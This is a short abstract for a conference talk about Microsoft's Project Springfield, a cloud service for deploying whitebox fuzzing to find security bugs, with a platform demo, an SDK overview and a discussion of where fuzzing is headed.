Fuzzing is an effective method for finding security bugs, but getting results is tricky because it needs expertise, machine power, and process changes to deploy. "Project Springfield" packages Microsoft's best practices, combined with a decade of research into machine reasoning and "whitebox fuzzing," into a cloud service that makes it easy to rapidly deploy fuzzing across an organization. Come hear how Microsoft customers and internal teams have embraced the cloud to gain scale, speed, and unique technology for finding serious security bugs, and how you can do the same. Learn lessons from building and operating a fuzzing platform that aims to help everyone, everywhere, test their security critical code. The talk will start with an overview of the Project Springfield cloud platform, including a demonstration of the web front end and an SDK for integration. The talk will then focus on a guided discussion of future directions for fuzzing: we want to hear from attendees what they need and what would work for them! Attendees will come away with a Project Springfield account to let them experiment with cloud fuzzing at home.